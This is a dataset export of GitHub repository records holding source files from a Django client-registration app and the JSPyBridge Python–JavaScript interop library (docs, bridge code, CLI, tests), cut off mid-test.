repo_name
stringlengths
5
114
repo_url
stringlengths
24
133
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
directory_id
stringlengths
40
40
branch_name
stringclasses
209 values
visit_date
timestamp[ns]
revision_date
timestamp[ns]
committer_date
timestamp[ns]
github_id
int64
9.83k
683M
star_events_count
int64
0
22.6k
fork_events_count
int64
0
4.15k
gha_license_id
stringclasses
17 values
gha_created_at
timestamp[ns]
gha_updated_at
timestamp[ns]
gha_pushed_at
timestamp[ns]
gha_language
stringclasses
115 values
files
listlengths
1
13.2k
num_files
int64
1
13.2k
guilhermeulbriki/Django-CadastroClientes
https://github.com/guilhermeulbriki/Django-CadastroClientes
3cc1ba59f6e941f273222248be6ade350d4a7c7f
c863415dffc33fbc154802c02607cbacc8e726b6
d0464a3ca6ac6ec972fafd5234161e5edf043978
refs/heads/master
2020-09-22T12:21:47.246666
2020-03-27T17:54:07
2020-03-27T17:54:07
225,191,658
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5328185558319092, "alphanum_fraction": 0.5727155804634094, "avg_line_length": 32.78260803222656, "blob_id": "3ba806bfdf0ab9d0689a391b6160d158f94e893c", "content_id": "3fbae2f805e7dc89da96ba86ecd3548f72e26ca1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 777, "license_type": "no_license", "max_line_length": 114, "num_lines": 23, "path": "/clientes/migrations/0002_funcionario.py", "repo_name": "guilhermeulbriki/Django-CadastroClientes", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.7 on 2019-11-25 14:18\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('clientes', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Funcionario',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('nome', models.CharField(max_length=255, verbose_name='Nome')),\n ('apelido', models.CharField(max_length=255, verbose_name='Apelido')),\n ('snap', models.CharField(max_length=255, verbose_name='Snap')),\n ('cpf', models.CharField(max_length=255, verbose_name='CPF')),\n ],\n ),\n ]\n" }, { "alpha_fraction": 0.8287292718887329, "alphanum_fraction": 0.8287292718887329, "avg_line_length": 35.20000076293945, "blob_id": "385ffc8ee12ddeb2b8242113d0e2dc2b90cb9366", "content_id": "7711fa3d8cf8f6188241e1cc7ca42b717708e068", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 185, "license_type": "no_license", "max_line_length": 131, "num_lines": 5, "path": "/README.md", "repo_name": "guilhermeulbriki/Django-CadastroClientes", "src_encoding": "UTF-8", "text": "# Django-CadastroClientes\n\nParte de um trabalho da disciplina de Tópicos Avançados durante o ensino médio, um sistema para cadastro de clientes e funcionários\n\nFoi utilizado DJANGO\n" }, { "alpha_fraction": 0.648809552192688, "alphanum_fraction": 0.648809552192688, "avg_line_length": 27.08333396911621, "blob_id": "70db9d4cace315e384fb85a7298d3ca091b724f6", "content_id": "1ceac15a23acf0426518b24f131ba42152a15f09", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 336, "license_type": "no_license", "max_line_length": 56, "num_lines": 12, "path": "/clientes/forms.py", "repo_name": "guilhermeulbriki/Django-CadastroClientes", "src_encoding": "UTF-8", "text": "from django import forms\nfrom .models import Cliente, Funcionario\n\nclass ClienteForm(forms.ModelForm):\n class Meta:\n model = Cliente\n fields = ('nome', 'endereco', 'telefone', 'cpf')\n\nclass FuncionarioForm(forms.ModelForm):\n class Meta:\n model = Funcionario\n fields = ('nome', 'apelido', 'snap', 'cpf')" }, { "alpha_fraction": 0.8152173757553101, "alphanum_fraction": 0.8152173757553101, "avg_line_length": 21.5, "blob_id": "05e4fa4caabf58a03f864d7879497262b48af570", "content_id": "635ec0b7736e26eb1cd1e0deb229aa7d3ecb2f44", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 92, "license_type": "no_license", "max_line_length": 32, "num_lines": 4, "path": "/clientes/admin.py", "repo_name": "guilhermeulbriki/Django-CadastroClientes", "src_encoding": "UTF-8", "text": "from django.contrib import admin\r\nfrom.models import Cliente\r\n\r\nadmin.site.register(Cliente)" }, { "alpha_fraction": 0.6957885026931763, "alphanum_fraction": 0.6957885026931763, "avg_line_length": 31.28358268737793, "blob_id": "3184fa565163a4c1974486d09326030cb72d1aad", "content_id": "0bdf4e3133b9f3716aebf2d38d82ba3df2f4a910", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2232, "license_type": "no_license", "max_line_length": 95, "num_lines": 67, "path": "/clientes/views.py", "repo_name": "guilhermeulbriki/Django-CadastroClientes", "src_encoding": "UTF-8", "text": "from datetime import datetime\r\nfrom django.shortcuts import render, redirect\r\nfrom django.http import HttpResponse\r\nfrom .models import Cliente, Funcionario\r\nfrom .forms import ClienteForm, FuncionarioForm\r\nfrom django.views.generic.edit import CreateView, UpdateView\r\nfrom django.urls import reverse_lazy\r\n\r\ndef home(request):\r\n clientes = Cliente.objects.all()\r\n funcionarios = Funcionario.objects.all()\r\n contexto = {\r\n 'clientes': clientes,\r\n 'funcionarios': funcionarios, \r\n }\r\n resposta = render(request, template_name=\"clientes/home.html\", context=contexto)\r\n return HttpResponse(resposta)\r\n\r\nclass ClienteCreateView(CreateView):\r\n model = Cliente\r\n form_class = ClienteForm\r\n template_name = \"clientes/cliente_form.html\"\r\n success_url = reverse_lazy('home')\r\n\r\nclass ClienteUpdateView(UpdateView):\r\n model = Cliente\r\n form_class = ClienteForm\r\n template_name = \"clientes/cliente_form.html\"\r\n success_url = reverse_lazy('home')\r\n\r\ndef detalhes_cliente(request, pk):\r\n cliente = Cliente.objects.get(pk=pk)\r\n contexto = {\r\n 'cliente': cliente, \r\n }\r\n resposta = render(request, template_name=\"clientes/cliente.html\", context=contexto)\r\n return HttpResponse(resposta)\r\n \r\ndef deleta_cliente(request, pk):\r\n cliente = Cliente.objects.get(pk=pk)\r\n cliente.delete()\r\n return redirect('home') \r\n\r\nclass FuncionarioCreateView(CreateView):\r\n model = Funcionario\r\n form_class = FuncionarioForm\r\n template_name = \"funcionarios/funcionario_form.html\"\r\n success_url = reverse_lazy('home')\r\n\r\nclass FuncionarioUpdateView(UpdateView):\r\n model = Funcionario\r\n form_class = FuncionarioForm\r\n template_name = \"funcionarios/funcionario_form.html\"\r\n success_url = reverse_lazy('home')\r\n\r\ndef detalhes_funcionario(request, pk):\r\n funcionario = Funcionario.objects.get(pk=pk)\r\n contexto = {\r\n 'funcionario': funcionario, \r\n }\r\n resposta = render(request, template_name=\"funcionarios/funcionario.html\", context=contexto)\r\n return HttpResponse(resposta)\r\n\r\ndef deleta_funcionario(request, pk):\r\n funcionario = Funcionario.objects.get(pk=pk)\r\n funcionario.delete()\r\n return redirect('home') \r\n" }, { "alpha_fraction": 0.7118977308273315, "alphanum_fraction": 0.7118977308273315, "avg_line_length": 61.5625, "blob_id": "217a0ea0ec48837d18e864d10977ea5b65f97c2e", "content_id": "859372f7b806a14eb83232c561edc1883c1a9948", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1017, "license_type": "no_license", "max_line_length": 115, "num_lines": 16, "path": "/aulatopicos/urls.py", "repo_name": "guilhermeulbriki/Django-CadastroClientes", "src_encoding": "UTF-8", "text": "from django.contrib import admin\r\nfrom django.urls import path\r\nfrom clientes import views as cliente_views\r\n\r\nurlpatterns = [\r\n path('', cliente_views.home, name='home'),\r\n path('cliente/add/', cliente_views.ClienteCreateView.as_view(), name=\"add_cliente\"),\r\n path('funcionario/add/', cliente_views.FuncionarioCreateView.as_view(), name=\"add_funcionario\"),\r\n path('cliente/<int:pk>/', cliente_views.detalhes_cliente, name=\"detalhes_cliente\"),\r\n path('funcionario/<int:pk>/', cliente_views.detalhes_funcionario, name=\"detalhes_funcionario\"),\r\n path('cliente/<int:pk>/update/', cliente_views.ClienteUpdateView.as_view(), name=\"update_cliente\"),\r\n path('cliente/<int:pk>/deleta/', cliente_views.deleta_cliente, name=\"deleta_cliente\"),\r\n path('funcionario/<int:pk>/update/', cliente_views.FuncionarioUpdateView.as_view(), name=\"update_funcionario\"),\r\n path('funcionario/<int:pk>/deleta/', cliente_views.deleta_funcionario, name=\"deleta_funcionario\"),\r\n path('admin/', admin.site.urls),\r\n]\r\n" }, { "alpha_fraction": 0.6770186424255371, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 47.53845977783203, "blob_id": "a9ea25eea8099317f9712943062139efcbc89fc9", "content_id": "42ef9e2e0dda75eb8fac0ceff73401f8ee399a70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 645, "license_type": "no_license", "max_line_length": 72, "num_lines": 13, "path": "/clientes/models.py", "repo_name": "guilhermeulbriki/Django-CadastroClientes", "src_encoding": "UTF-8", "text": "from django.db import models\r\n\r\nclass Cliente(models.Model):\r\n nome = models.CharField(max_length=255, verbose_name=\"Nome\")\r\n endereco = models.CharField(max_length=350, verbose_name=\"Endereço\")\r\n telefone = models.CharField(max_length=255, verbose_name=\"Telefone\")\r\n cpf = models.CharField(max_length=255, verbose_name=\"CPF\")\r\n\r\nclass Funcionario(models.Model):\r\n nome = models.CharField(max_length=255, verbose_name=\"Nome\")\r\n apelido = models.CharField(max_length=255, verbose_name=\"Apelido\")\r\n snap = models.CharField(max_length=255, verbose_name=\"Snap\")\r\n cpf = models.CharField(max_length=255, verbose_name=\"CPF\")\r\n" } ]
7
ishan-marikar/JSPyBridge
https://github.com/ishan-marikar/JSPyBridge
fe6e003a07b4ee6923342fa54a473eae65ff44c0
046152d27b0179d4c1f6c338bb6a77df2372ac0c
042b45d8f8a1ecf03ce4ce440e021a7960418571
refs/heads/master
2023-07-13T21:40:46.600109
2021-09-01T21:05:49
2021-09-01T21:05:49
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.736923336982727, "alphanum_fraction": 0.7401818037033081, "avg_line_length": 40.657142639160156, "blob_id": "5f59ceaa132892ef73145bee3ed85a8c5822a3a4", "content_id": "5ec993789f997f9cd536e89be8f14e8674d6dc1c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5831, "license_type": "permissive", "max_line_length": 350, "num_lines": 140, "path": "/docs/python.md", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "# Docs for bridge to call JavaSript from Python\n\n(See README.md for some additional details)\n\n* All function calls to JavaScript are thread synchronous\n* ES6 classes can be constructed without new\n* ES5 classes can be constructed with the .new psuedo method\n* Use `@On` decorator when binding event listeners. Use `off` to disable it.\n* All callbacks run on a dedicated callback thread. DO NOT BLOCK in a callback or all other events will be blocked. Instead:\n* Use the @AsyncTask decorator when you need to spawn a new thread for an async JS task.\n\n\n## Built-ins\n\nDependencies are automatically maanged through the library through the `require` function. If\nyou run into issues with dependencies, you can clear the internal `node_modules` folder cache\nby using `python3 -m javascript --clean` in a command line.\n\nYou can update the internal packages with `python3 -m javascript --update <npm package>`. \n\nYou can install a package internally by using `python3 -m javascript --install <npm package>`. Internally, whatever you place after --update will be passed to `npm install <...>`. For example, use `python3 -m javascript --install PrismarineJS/vec3` to install the `vec3` package from git.\n\n### imports\n\n```py\ndef require ( package_name: str, package_version: Optional[str] = None ) -> Void\n```\n\n* `package_name` : The name of the npm package you want to import. If you use a relative import\n (starting with . or /) then it will load the file relative to where your calling script is.\n* `package_version` : The version of the npm package you want to install. If blank, first try to\n require from the local or global npm registry. If not found, install the specified package name\n and version. These two combine to create a unique ID, for example `chalk--1.0`. This ensures two\n different versiond don't collide. This parameter is ignored for relative imports.\n\n### threads\n\nThis library provides some wrappers around threads. You aren't forced to use them, but they\nhelp you avoid boilerplate and are simple to use.\n\n```py\nfrom javascript import AsyncTask, start, stop, abort\n@AsyncTask(start=True)\ndef routine(task: TaskState):\n ...\n\n# The signatures for the above functions :\ndef start(fn: Function): ...\ndef stop(fn: Function): ...\ndef abort(fn: Function, killAfterSeconds: Optional[Int]): ...\nclass TaskState:\n sleeping: bool\n def wait(seconds: Int): ...\n sleep = wait # Sleep is an alias to wait.\n```\n\nThe AsyncTask decorator is a wrapper for creating threads. Any function you wrap with it will\nresult in the creation of a thread, bound to the specified function. It will *not* automatically\nstart the thread, unless `start` parameter is set to True. \n\nThe `start()`, `stop()` and `abort()` functions all relate to AsyncTask threads. If you didn't\nalready start a AsyncTask, you can programmatically start it later with `start(routine)`. If you\nwant a thread to stop, you can send a `stopping` signal to it. The first parameter to all AsyncTasks\nis a `TaskState` object. That object has a `stopping` variable, and a `wait` function. The stopping\nvariable indicates that the thread should exit immediately, and it's your responsibility to make\nsure it does. The `wait` function that exists in TaskState will sleep, but also automatically exit \nthe process once the `stopping` flag is True. \n\n```py\nimport time\nfrom javascript import AsyncTask, start, stop, abort\n@AsyncTask(start=False)\ndef routine(task: TaskState):\n while not task.stopping: # You can also just do `while True` as long as you use task.sleep and not time.sleep\n ... do some repeated task ...\n task.sleep(1) # Sleep for a bit to not block everything else\n\nstart(routine)\ntime.sleep(1)\nstop(routine)\n```\n\nIf you need to be 100% sure the thread has stopped, you can use `abort(fn, seconds)` function instead. This\nwill kill the thread if it doesn't kill in n seconds. It's not good pratice to kill Python threads, so\navoid this when possible. To avoid trouble, `stop()` does not force the thread to exit, it just asks.\n\n### events\n\nThis library provides some wrappers around EventEmitters. You must use them over the built-in\n`.on`, `.off` and `.once` methods of normal EventEmitters. You can still use `.emit` normally.\n\nThese wrappers are avaliable as `@On(emitter, eventName)`, `@Once(emitter, eventName)` and\nthe top-level `off(emitter, eventName, handlerFn)` function.\n\nNote that you are still able to use the `once` static function from Node.js's `emitter` library.\nThis library provides a default export for this, used as in the example below.\n\n```py\nfrom javascript import require, On, Once, off, once\nMyEmitter = require('./emitter.js')\n# New class instance\nmyEmitter = MyEmitter()\n# Decorator usage\n@On(myEmitter, 'increment')\ndef handleIncrement(this, counter):\n print(\"Incremented\", counter)\n # Stop listening. `this` is the this variable in JS.\n off(myEmitter, 'increment', handleIncrement)\n# Trigger the event handler\nmyEmitter.inc()\n```\n\n### expression evaluation\n\nYou can use the exported `eval_js` function to evaluate JavaScript code within the current Python context. The parameter to this function is a JS string to evaluate, with access to all the Python variables in scope. Make sure to use `await` anywhere you do a function call or a property access on a Python object. You can set variables without await.\n\n```julia\nimport javascript\n\ncountUntil = 9\nmyArray = [1]\nmyObject = { 'hello': '' }\n\n# Make sure you await everywhere you expect a JS call !\noutput = javascript.eval_js('''\n myObject['world'] = 'hello' \n for (let x = 0; x < countUntil; x++) {\n await myArray.append(2)\n }\n return 'it worked'\n''')\n\n# If we look at myArray and myObject, we should see it updated\nprint(output, myArray, myObject)\n```\n\nYou can also use it inline.\n```swift\nx_or_z = eval_js(''' obj.x ?? obj.z ''')\n```" }, { "alpha_fraction": 0.496613472700119, "alphanum_fraction": 0.49744129180908203, "avg_line_length": 35.10869598388672, "blob_id": "5456157cc10670651bcc1ae05736df192904a003", "content_id": "6ce73d6dbad8025068374a79210794fbe3d579f9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13291, "license_type": "permissive", "max_line_length": 99, "num_lines": 368, "path": "/src/pythonia/Bridge.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "import inspect, importlib, importlib.util\nimport json, types, traceback, os, sys\nfrom proxy import Executor, Proxy\nfrom weakref import WeakValueDictionary\n\n\ndef python(method):\n return importlib.import_module(method, package=None)\n\n\ndef fileImport(moduleName, absolutePath, folderPath):\n if folderPath not in sys.path:\n sys.path.append(folderPath)\n spec = importlib.util.spec_from_file_location(moduleName, absolutePath)\n foo = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(foo)\n return foo\n\n\nclass Iterate:\n def __init__(self, v):\n self.what = v\n\n # If we have a normal iterator, we need to make it a generator\n if inspect.isgeneratorfunction(v):\n it = self.next_gen()\n elif hasattr(v, \"__iter__\"):\n it = self.next_iter()\n\n def next_iter():\n try:\n return next(it)\n except Exception:\n return \"$$STOPITER\"\n\n self.Next = next_iter\n\n def next_iter(self):\n for entry in self.what:\n yield entry\n return\n\n def next_gen(self):\n yield self.what()\n\n\nfix_key = lambda key: key.replace(\"~~\", \"\") if type(key) is str else key\n\n\nclass Bridge:\n m = {\n 0: {\n \"python\": python,\n \"open\": open,\n \"fileImport\": fileImport,\n \"eval\": eval,\n \"exec\": exec,\n \"setattr\": setattr,\n \"getattr\": getattr,\n \"Iterate\": Iterate,\n \"tuple\": tuple,\n \"set\": set,\n \"enumerate\": enumerate,\n \"repr\": repr,\n }\n }\n # Things added to this dict are auto GC'ed\n weakmap = WeakValueDictionary()\n cur_ffid = 0\n\n def __init__(self, ipc):\n self.ipc = ipc\n # This toggles if we want to send inspect data for console logging. It's auto\n # disabled when a for loop is active; use `repr` to request logging instead.\n self.m[0][\"sendInspect\"] = lambda x: setattr(self, \"send_inspect\", x)\n self.send_inspect = True\n self.q = lambda r, key, val, sig=\"\": self.ipc.queue(\n {\"r\": r, \"key\": key, \"val\": val, \"sig\": sig}\n )\n self.executor = Executor(self)\n\n setattr(os, \"JSPyBridge\", Proxy(self.executor, 0))\n\n def assign_ffid(self, what):\n self.cur_ffid += 1\n self.m[self.cur_ffid] = what\n return self.cur_ffid\n\n def make_class(this, name, proxy, bases, overriden):\n def init(self):\n for base_ffid, baseArgs, baseKwargs in bases:\n base = this.m[base_ffid]\n base.__init__(self, *baseArgs, **baseKwargs)\n\n def getAttribute(self, attr):\n if attr.startswith(\"__\"):\n return object.__getattribute__(self, attr)\n if attr.startswith(\"~~\"): # Bypass keyword for our __getattribute__ trap\n return super(clas, self).__getattribute__(attr[2:])\n if attr in overriden:\n return getattr(proxy, attr)\n return super(clas, self).__getattribute__(attr)\n\n def setAttr(self, attr, val):\n # Trippy stuff, but we need to set on both super and this\n # to avoid a mess\n super(clas, self).__setattr__(attr, val)\n object.__setattr__(self, attr, val)\n\n base_classes = []\n for base_ffid, a, kw in bases:\n base = this.m[base_ffid]\n base_classes.append(base)\n\n claz = type(base_classes[0])\n clas = type(\n name,\n tuple(base_classes),\n {\"__init__\": init, \"__getattribute__\": getAttribute, \"__setattr__\": setAttr},\n )\n inst = clas()\n setattr(proxy, \"~class\", inst)\n return inst\n\n # Here, we allocate two different refrences. The first is the Proxy to the JS\n # class, the send is a ref to our Python class. Both refs are GC tracked by JS.\n def makeclass(self, r, ffid, key, params):\n self.cur_ffid += 1\n js_ffid = self.cur_ffid\n proxy = Proxy(self.executor, js_ffid)\n self.m[js_ffid] = proxy\n inst = self.make_class(params[\"name\"], proxy, params[\"bases\"], params[\"overriden\"])\n py_ffid = self.assign_ffid(inst)\n self.q(r, \"inst\", [js_ffid, py_ffid])\n\n def length(self, r, ffid, keys, args):\n v = self.m[ffid]\n for key in keys:\n if type(v) in (dict, tuple, list):\n v = v[key]\n elif hasattr(v, str(key)):\n v = getattr(v, str(key))\n elif hasattr(v, \"__getitem__\"):\n try:\n v = v[key]\n except:\n raise LookupError(f\"Property '{fix_key(key)}' does not exist on {repr(v)}\")\n else:\n raise LookupError(f\"Property '{fix_key(key)}' does not exist on {repr(v)}\")\n l = len(v)\n self.q(r, \"num\", l)\n\n def init(self, r, ffid, key, args):\n v = self.m[ffid](*args)\n ffid = self.assign_ffid(v)\n self.q(r, \"inst\", ffid)\n\n def call(self, r, ffid, keys, args, kwargs, invoke=True):\n v = self.m[ffid]\n # Subtle differences here depending on if we want to call or get a property.\n # Since in Python, items ([]) and attributes (.) function differently,\n # when calling first we want to try . then []\n # For example with the .append function we don't want ['append'] taking\n # precedence in a dict. However if we're only getting objects, we can\n # first try bracket for dicts, then attributes.\n if invoke:\n for key in keys:\n t = getattr(v, str(key), None)\n if t:\n v = t\n elif hasattr(v, \"__getitem__\"):\n try:\n v = v[key]\n except:\n raise LookupError(f\"Property '{fix_key(key)}' does not exist on {repr(v)}\")\n else:\n raise LookupError(f\"Property '{fix_key(key)}' does not exist on {repr(v)}\")\n else:\n for key in keys:\n if type(v) in (dict, tuple, list):\n v = v[key]\n elif hasattr(v, str(key)):\n v = getattr(v, str(key))\n elif hasattr(v, \"__getitem__\"):\n try:\n v = v[key]\n except:\n raise LookupError(f\"Property '{fix_key(key)}' does not exist on {repr(v)}\")\n else:\n raise LookupError(f\"Property '{fix_key(key)}' does not exist on {repr(v)}\")\n\n # Classes when called will return void, but we need to return\n # object to JS.\n was_class = False\n if invoke:\n if inspect.isclass(v):\n was_class = True\n v = v(*args, **kwargs)\n typ = type(v)\n if typ is str:\n self.q(r, \"string\", v)\n return\n if typ is int or typ is float or (v is None) or (v is True) or (v is False):\n self.q(r, \"int\", v)\n return\n if inspect.isclass(v) or isinstance(v, type):\n # We need to increment FFID\n self.q(r, \"class\", self.assign_ffid(v), self.make_signature(v))\n return\n if callable(v): # anything with __call__\n self.q(r, \"fn\", self.assign_ffid(v), self.make_signature(v))\n return\n if (typ is dict) or (inspect.ismodule(v)) or was_class: # \"object\" in JS speak\n self.q(r, \"obj\", self.assign_ffid(v), self.make_signature(v))\n return\n if typ is list:\n self.q(r, \"list\", self.assign_ffid(v), self.make_signature(v))\n return\n if hasattr(v, \"__class__\"): # numpy generator can't be picked up without this\n self.q(r, \"class\", self.assign_ffid(v), self.make_signature(v))\n return\n self.q(r, \"void\", self.cur_ffid)\n\n # Same as call just without invoking anything, and args\n # would be null\n def get(self, r, ffid, keys, args):\n o = self.call(r, ffid, keys, [], {}, invoke=False)\n return o\n\n def Set(self, r, ffid, keys, args):\n v = self.m[ffid]\n on, val = args\n for key in keys:\n if type(v) in (dict, tuple, list):\n v = v[key]\n elif hasattr(v, str(key)):\n v = getattr(v, str(key))\n else:\n try:\n v = v[key]\n except:\n raise LookupError(f\"Property '{fix_key(key)}' does not exist on {repr(v)}\")\n if type(v) in (dict, tuple, list, set):\n v[on] = val\n else:\n setattr(v, on, val)\n self.q(r, \"void\", self.cur_ffid)\n\n def inspect(self, r, ffid, keys, args):\n v = self.m[ffid]\n for key in keys:\n v = getattr(v, key, None) or v[key]\n s = repr(v)\n self.q(r, \"\", s)\n\n # no ACK needed\n def free(self, r, ffid, key, args):\n for i in args:\n if i not in self.m:\n continue\n del self.m[i]\n\n def make(self, r, ffid, key, args):\n self.cur_ffid += 1\n p = Proxy(self.executor, self.cur_ffid)\n # We need to put into both WeakMap and map to prevent immedate GC\n self.weakmap[self.cur_ffid] = p\n self.m[self.cur_ffid] = p\n self.ipc.queue({\"r\": r, \"val\": self.cur_ffid})\n\n def queue_request(self, request_id, payload, timeout=None):\n payload[\"c\"] = \"jsi\"\n self.ipc.queue(payload)\n\n def queue_request_raw(self, request_id, payload, timeout=None):\n self.ipc.queue(payload)\n\n def make_signature(self, what):\n if self.send_inspect:\n return repr(what)\n return \"\"\n\n def read(self):\n data = self.ipc.readline()\n if not data:\n exit()\n j = json.loads(data)\n return j\n\n def pcall(self, r, ffid, key, args, set_attr=False):\n created = {}\n # Convert special JSON objects to Python methods\n def process(json_input, lookup_key):\n if isinstance(json_input, dict):\n for k, v in json_input.items():\n if isinstance(v, dict) and (lookup_key in v):\n lookup = v[lookup_key]\n if lookup == \"\":\n self.cur_ffid += 1\n proxy = (\n self.m[v[\"extend\"]]\n if \"extend\" in v\n else Proxy(self.executor, self.cur_ffid)\n )\n self.weakmap[self.cur_ffid] = proxy\n json_input[k] = proxy\n created[v[\"r\"]] = self.cur_ffid\n else:\n json_input[k] = self.m[lookup]\n else:\n process(v, lookup_key)\n elif isinstance(json_input, list):\n for k, v in enumerate(json_input):\n if isinstance(v, dict) and (lookup_key in v):\n lookup = v[lookup_key]\n if lookup == \"\":\n self.cur_ffid += 1\n proxy = (\n self.m[v[\"extend\"]]\n if \"extend\" in v\n else Proxy(self.executor, self.cur_ffid)\n )\n self.weakmap[self.cur_ffid] = proxy\n json_input[k] = proxy\n created[v[\"r\"]] = self.cur_ffid\n else:\n json_input[k] = self.m[lookup]\n else:\n process(v, lookup_key)\n\n process(args, \"ffid\")\n pargs, kwargs = args\n if len(created):\n self.q(r, \"pre\", created)\n if set_attr:\n self.Set(r, ffid, key, pargs)\n else:\n self.call(r, ffid, key, pargs, kwargs or {})\n\n def setval(self, r, ffid, key, args):\n return self.pcall(r, ffid, key, args, set_attr=True)\n\n # This returns a primitive version (JSON-serialized) of the object\n # including arrays and dictionary/object maps, unlike what the .get\n # and .call methods do where they only return numeric/strings as\n # primitive values and everything else is an object refrence.\n def value(self, r, ffid, keys, args):\n v = self.m[ffid]\n\n for key in keys:\n t = getattr(v, str(key), None)\n if t is None:\n v = v[key] # 🚨 If you get an error here, you called an undefined property\n else:\n v = t\n\n # TODO: do we realy want to worry about functions/classes here?\n # we're only supposed to send primitives, probably best to ignore\n # everything else.\n # payload = json.dumps(v, default=lambda arg: None)\n self.q(r, \"ser\", v)\n\n def onMessage(self, r, action, ffid, key, args):\n try:\n return getattr(self, action)(r, ffid, key, args)\n except Exception:\n self.q(r, \"error\", \"\", traceback.format_exc())\n pass\n" }, { "alpha_fraction": 0.6373727917671204, "alphanum_fraction": 0.6373727917671204, "avg_line_length": 28.216217041015625, "blob_id": "b23c74f7455c64de657fe77bab6732527b01ed74", "content_id": "d1f55cabd20e041b99108f6becf11bbe1f204788", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1081, "license_type": "permissive", "max_line_length": 114, "num_lines": 37, "path": "/src/javascript/__main__.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "import os, sys, argparse, shutil\n\nparser = argparse.ArgumentParser(\n description=\"javascript (JSPyBridge) package manager. Use this to clear or update the internal package store.\"\n)\nparser.add_argument(\"--clean\", default=False, action=\"store_true\")\nparser.add_argument(\"--update\", default=False, action=\"store_true\")\nparser.add_argument(\"--install\", default=False, action=\"store\")\nargs = parser.parse_args()\n\nif args.clean:\n d = os.path.dirname(__file__)\n nm = d + \"/js/node_modules/\"\n nl = d + \"/js/package-lock.json\"\n np = d + \"/js/package.json\"\n print(\"Deleting\", nm, nl, np)\n try:\n shutil.rmtree(nm)\n except Exception:\n pass\n try:\n os.remove(nl)\n except Exception:\n pass\n try:\n os.remove(np)\n except Exception:\n pass\nelif args.update:\n print(\"Updating package store\")\n os.chdir(os.path.dirname(__file__) + \"/js\")\n os.system(\"npm update\")\nelif args.install:\n os.chdir(os.path.dirname(__file__) + \"/js\")\n os.system(f\"npm install {args.install}\")\nelse:\n parser.print_help(sys.stderr)\n" }, { "alpha_fraction": 0.4869358539581299, "alphanum_fraction": 0.5083135366439819, "avg_line_length": 10.666666984558105, "blob_id": "a694b9aa033b07256dec3bf7745b478bcfd0e78b", "content_id": "672bc7e5f7ba4bda5f70409289a8df7ec3c1c73d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 421, "license_type": "permissive", "max_line_length": 54, "num_lines": 36, "path": "/test/pythonia/pyImp.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "print(\"hello world :)\")\n\n\ndef add_inverse(a, b):\n return -1 * (a + b)\n\n\ndef complex_num():\n return 1j * 1j\n\n\ndef inner():\n return 3\n\n\ndef some_event(cb, vfn):\n print(\"CB\", cb, vfn, vfn.someMethod(), vfn.get(3))\n cb(\"from python\", inner)\n\n\ndef iter(obj):\n ret = []\n for key in obj:\n ret.append(key)\n return ret\n\n\nx = [1, 2, 3]\ny = {\"a\": \"wow\", \"b\": \"naw\"}\n\n\nclass A:\n prop = 3\n\n\na = A()\n\n" }, { "alpha_fraction": 0.5523174405097961, "alphanum_fraction": 0.5681179761886597, "avg_line_length": 21.79199981689453, "blob_id": "709617afc6d4f4665b6138f4df2e0a43fc918edb", "content_id": "2a73022a7cb554b012666e9a01cd9c61220cd6aa", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2848, "license_type": "permissive", "max_line_length": 73, "num_lines": 125, "path": "/test/javascript/test_general.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "from javascript import require, console, On, Once, off, once, eval_js\n\ndef assertEquals(cond, val): assert cond == val\n\ndef test_require():\n chalk = require(\"chalk\")\n fs = require(\"fs\")\n print(\"Hello\", chalk.red(\"world!\"))\n test = require(\"./test.js\")\n\n\ndef test_classes():\n global demo\n DemoClass = require(\"./test.js\").DemoClass\n demo = DemoClass(\"blue\", {\"a\": 3}, lambda v: assertEquals(v, 3))\n # New psuedo operator\n demo2 = DemoClass.new(\"blue\", {\"a\": 3}, lambda v: assertEquals(v, 3))\n\n assert demo.ok()(1, 2, 3) == 6\n assert demo.toString() == '123!'\n assert demo.ok().x == 'wow'\n assert DemoClass.hello() == 'world'\n\ndef test_iter():\n DemoClass = require(\"./test.js\").DemoClass\n demo = DemoClass(\"blue\", {\"a\": 3}, lambda v: print(\"Should be 3\", v))\n\n f = None\n for i in demo.array():\n print(\"i\", i)\n f = i\n assert f.a == 3\n\n expect = ['x', 'y', 'z']\n for key in demo.object():\n assert key == expect.pop(0)\n\ndef some_method(text):\n print(\"Callback called with\", text)\n assert text == 'It works !'\n\ndef test_callback():\n demo.callback(some_method)\n\ndef test_events():\n @On(demo, \"increment\")\n def handler(this, fn, num, obj):\n print(\"Handler caled\", fn, num, obj)\n if num == 7:\n off(demo, \"increment\", handler)\n\n @Once(demo, \"increment\")\n def onceIncrement(this, *args):\n print(\"Hey, I'm only called once !\")\n\n\n demo.increment()\n\ndef test_arrays():\n demo.arr[1] = 5\n demo.obj[1] = 5\n demo.obj[2] = some_method\n 